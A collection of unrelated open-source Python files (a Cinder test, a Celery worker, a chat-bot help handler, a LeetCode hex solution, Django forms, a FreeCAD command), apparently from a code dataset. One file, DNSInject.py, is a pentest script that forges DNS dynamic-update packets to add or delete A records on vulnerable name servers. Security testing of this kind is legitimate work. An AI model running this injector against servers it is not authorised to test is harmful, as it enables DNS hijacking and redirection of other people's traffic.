class LinkPrefixTest(test.TestCase):
def test_update_link_prefix(self):
vb = common.ViewBuilder()
result = vb._update_link_prefix("http://192.168.0.243:24/",
"http://127.0.0.1/volume")
self.assertEqual("http://127.0.0.1/volume", result)
result = vb._update_link_prefix("http://foo.x.com/v1",
"http://new.prefix.com")
self.assertEqual("http://new.prefix.com/v1", result)
result = vb._update_link_prefix(
"http://foo.x.com/v1",
"http://new.prefix.com:20455/new_extra_prefix")
self.assertEqual("http://new.prefix.com:20455/new_extra_prefix/v1",
result)
|
CloudServer/cinder
|
cinder/tests/unit/api/test_common.py
|
Python
|
apache-2.0
| 24,477 | 0 |
# -*-coding: utf-8-*-
from celery import Celery
from op import utils
import celeryconfig
worker = Celery('Regular-Ticket-Task')
worker.config_from_object(celeryconfig)
worker.conf.BROKER_URL = utils.get_config('celery', 'BROKER_URL')
worker.conf.CELERY_RESULT_BACKEND = utils.get_config('celery', 'CELERY_RESULT_BACKEND')
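# A minimal usage sketch, assuming the configured broker is reachable; the
# task name 'tasks.example' is illustrative and not defined in this repo:
#
#     result = worker.send_task('tasks.example', args=[1, 2])
#     print(result.get(timeout=10))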
|
EthanGuo/regular-ticket-task
|
worker.py
|
Python
|
mit
| 325 | 0.003077 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
#~#######################################################################
#~ Copyright (c) 2008 Burdakov Daniel <kreved@kreved.org> #
#~ #
#~ This file is part of FreQ-bot. #
#~ #
#~ FreQ-bot is free software: you can redistribute it and/or modify #
#~ it under the terms of the GNU General Public License as published by #
#~ the Free Software Foundation, either version 3 of the License, or #
#~ (at your option) any later version. #
#~ #
#~ FreQ-bot is distributed in the hope that it will be useful, #
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of #
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#~ GNU General Public License for more details. #
#~ #
#~ You should have received a copy of the GNU General Public License #
#~ along with FreQ-bot. If not, see <http://www.gnu.org/licenses/>. #
#~#######################################################################
import re
def help_handler(t, s, p):
p = p.strip()
q = re.search('^(\-..\ )?\.?(.+)$', p)
if q:
rlang = q.groups()[0]
if rlang: rlang = rlang[1:3]
else: rlang = lang.getLang(s.jid)
p = q.groups()[1]
if p.startswith('.'): p = p[1:]
else:
rlang = lang.getLang(s.jid)
p = ''
if p:
if p.startswith('.'): p = p[1:]
if p in HELP_CATEGORIES:
answer = HELP_CATEGORIES[p]
answer.sort()
answer = ', '.join(answer)
s.lmsg(t, 'help_category', answer)
else:
if p in HELP_LANGS:
q = HELP_LANGS[p]
if rlang in q:
content = load_help_content(p, rlang)
categories = ', '.join([w for w in HELP_CATEGORIES.keys() if p in HELP_CATEGORIES[w]])
s.lmsg(t, 'help_show', categories, content)
else:
languages = HELP_LANGS[p]
languages = ["'.help -%s %s'" % (w, p) for w in languages]
s.lmsg(t, 'help_other_languages', p, rlang, ', '.join(languages))
else: s.lmsg(t, 'help_not_found', p)
else:
ans = ['%s(%s)' % (w, len(HELP_CATEGORIES[w])) for w in HELP_CATEGORIES.keys()]
ans.sort()
categories = ', '.join(ans)
s.lmsg(t, 'help_categories', categories)
bot.register_cmd_handler(help_handler, '.help')
bot.register_cmd_handler(help_handler, 'help')
|
TLemur/freq-bot
|
src/plugins/help/help_handler.py
|
Python
|
gpl-3.0
| 2,586 | 0.023975 |
#!/usr/bin/env python
# by Chris Truncer
# Script that attempts to forge a DNS dynamic-update packet injecting a new
# value for a DNS record. See Nessus plugin #35372.
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
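# Example invocations (a sketch; the name server and addresses mirror the
# argparse metavars below and are illustrative values only):
#   python DNSInject.py --add -ns ns1.test.com -d mynewarecord.test.com -ip 192.168.1.1
#   python DNSInject.py --delete -ns ns1.test.com -d mynewarecord.test.com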
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.add_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
    # Choose the function to run based on the parsed action flags
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
|
ChrisTruncer/PenTestScripts
|
HostScripts/DNSInject.py
|
Python
|
gpl-3.0
| 4,615 | 0.002384 |
from django import forms
from empresas.models import Usuario, Pessoa, Empresa
class LoginForm(forms.Form):
username = forms.CharField(max_length='200', required=True)
password = forms.CharField(widget=forms.PasswordInput, required=True)
class UsuarioForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = Usuario
class PessoaForm(forms.ModelForm):
class Meta:
model = Pessoa
class EmpresaForm(forms.ModelForm):
class Meta:
model = Empresa
|
mateusportal/portalconta
|
empresas/forms.py
|
Python
|
gpl-2.0
| 537 | 0.007449 |
__source__ = ''
# https://github.com/kamyu104/LeetCode/blob/master/Python/convert-a-number-to-hexadecimal.py
# Time: O(logn)
# Space: O(1)
#
# Description:
#
# Given an integer, write an algorithm to convert it to hexadecimal.
# For negative integer, two's complement method is used.
#
# IMPORTANT:
# You must not use any method provided by the library which converts/formats
# the number to hex directly. Such solution will result in disqualification of
# all your submissions to this problem. Users may report such solutions after the
# contest ends and we reserve the right of final decision and interpretation
# in the case of reported solutions.
#
# Note:
#
# All letters in hexadecimal (a-f) must be in lowercase.
# The hexadecimal string must not contain extra leading 0s. If the number is zero,
# it is represented by a single zero character '0'; otherwise,
# the first character in the hexadecimal string will not be the zero character.
# The given number is guaranteed to fit within the range of a 32-bit signed integer.
# You must not use any method provided by the library which converts/formats the number to hex directly.
# Example 1:
#
# Input:
# 26
#
# Output:
# "1a"
# Example 2:
#
# Input:
# -1
#
# Output:
# "ffffffff"
# Bit Manipulation
import unittest
# 20ms 98.60%
class Solution(object):
def toHex(self, num):
return ''.join('0123456789abcdef'[(num >> 4 * i) & 15]
for i in range(8)
)[::-1].lstrip('0') or '0'
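    # Worked sketch for num = 26 (0b11010): nibble 0 is 26 & 15 == 10 -> 'a',
    # nibble 1 is (26 >> 4) & 15 == 1 -> '1', nibbles 2..7 are 0; reversing
    # and stripping leading zeros gives '1a', matching Example 1 above.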
def toHex2(self, num):
"""
:type num: int
:rtype: str
"""
if not num:
return "0"
res = []
while num and len(res) != 8:
h = num & 15
if h < 10:
res.append(str(chr(ord('0') + h)))
else:
res.append(str(chr(ord('a') + h - 10)))
num >>= 4
res.reverse()
return "".join(res)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# https://ratchapong.com/algorithm-practice/leetcode/convert-a-number-to-hexadecimal
# Thought: each time we look at the last four bits of the
binary version of the input and map them to a hex char, then
shift the input to the right by 4 bits, and repeat
until the input becomes 0.
# 3ms 100%
class Solution {
public String toHex(int num) {
if (num == 0) return "0";
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (num != 0) {
sb.insert(0, map[num & 0b1111]);
num = num >>> 4;
}
return sb.toString();
}
}
Worst Case
O(log16(n)): the running time grows with the number of hexadecimal digits in the input.
Extra space is needed to store the equivalent base-16 string.
Approach: Shifting and Masking
The number is masked against binary 1111 each time to get the component value,
which is then mapped to the corresponding character. >>> is used to right-shift
by 4 bit positions with zero-extension; the zero-extension naturally handles
negative numbers. StringBuilder is used because it inserts characters into an
existing object efficiently; with a normal String, each insertion via the +
operator would copy over the immutable String object, which is highly inefficient.
The worst case is Integer.MAX_VALUE, Integer.MIN_VALUE, or any input with 8
hexadecimal characters, where the iterations last the longest: for
Integer.MAX_VALUE the loop runs at most floor(log16(2^31 - 1)) + 1 = 8 times.
# 3ms 100%
class Solution {
public String toHex(int num) {
long n = num & 0x00000000ffffffffL;
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (n > 0) {
sb.insert(0, map[(int) (n % 16)]);
n = n / 16;
}
return num == 0 ? "0" : sb.toString();
}
}
Worst Case
O(log16(n)): the running time grows with the number of hexadecimal digits in the input.
Extra space is needed to store the equivalent base-16 string.
Approach: Divide and Mod
To deal with negative numbers, the number is masked into a long data type,
which converts it to a non-negative long value.
A simple while loop is then used to extract each base-16 digit until the number becomes 0.
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/ConvertANumberToHexadecimal.py
|
Python
|
apache-2.0
| 4,592 | 0.004138 |
# ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "Command Mesh Netgen From Shape"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
## @package CommandFemMeshNetgenFromShape
# \ingroup FEM
import FreeCAD
from FemCommands import FemCommands
import FreeCADGui
import FemGui
from PySide import QtCore
class _CommandFemMeshNetgenFromShape(FemCommands):
# the FEM_MeshNetgenFromShape command definition
def __init__(self):
super(_CommandFemMeshNetgenFromShape, self).__init__()
self.resources = {'Pixmap': 'fem-femmesh-netgen-from-shape',
'MenuText': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "FEM mesh from shape by Netgen"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "Create a FEM volume mesh from a solid or face shape by Netgen internal mesher")}
self.is_active = 'with_part_feature'
def Activated(self):
FreeCAD.ActiveDocument.openTransaction("Create FEM mesh Netgen")
FreeCADGui.addModule("FemGui")
sel = FreeCADGui.Selection.getSelection()
if (len(sel) == 1):
if(sel[0].isDerivedFrom("Part::Feature")):
FreeCADGui.doCommand("App.activeDocument().addObject('Fem::FemMeshShapeNetgenObject', '" + sel[0].Name + "_Mesh')")
FreeCADGui.doCommand("App.activeDocument().ActiveObject.Shape = App.activeDocument()." + sel[0].Name)
if FemGui.getActiveAnalysis():
FreeCADGui.addModule("FemGui")
FreeCADGui.doCommand("FemGui.getActiveAnalysis().Member = FemGui.getActiveAnalysis().Member + [App.ActiveDocument.ActiveObject]")
FreeCADGui.doCommand("Gui.activeDocument().setEdit(App.ActiveDocument.ActiveObject.Name)")
FreeCADGui.Selection.clearSelection()
FreeCADGui.addCommand('FEM_MeshNetgenFromShape', _CommandFemMeshNetgenFromShape())
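# A hedged usage sketch: once registered above, the command can be triggered
# from the Python console (FreeCADGui.runCommand is assumed available in this
# FreeCAD era) with a Part feature selected in an active document:
#
#     FreeCADGui.runCommand('FEM_MeshNetgenFromShape')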
|
bblacey/FreeCAD-MacOS-CI
|
src/Mod/Fem/PyGui/_CommandFemMeshNetgenFromShape.py
|
Python
|
lgpl-2.1
| 3,519 | 0.002273 |